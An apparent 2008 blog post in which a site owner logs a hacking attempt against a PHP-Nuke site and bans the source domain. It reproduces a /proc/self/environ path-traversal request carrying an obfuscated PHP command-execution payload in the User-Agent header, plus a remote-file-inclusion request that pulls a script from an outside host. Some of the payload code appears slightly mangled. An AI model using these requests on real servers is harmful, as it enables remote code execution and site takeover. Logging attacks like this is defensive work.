Sep 11, 2008

serverkompetenz.net Hackers

serverkompetenz.net is a hacker not a spambot.

.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent:
 $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");


81.169.152.101 h986442.serverkompetenz.net

Bot atempted to include some script in place of its user agent string.

It then tried to remote load a script.
Blacklist Domain Ban: serverkompetenz.net
.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1
Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank]
81.169.152.101 h986442.serverkompetenz.net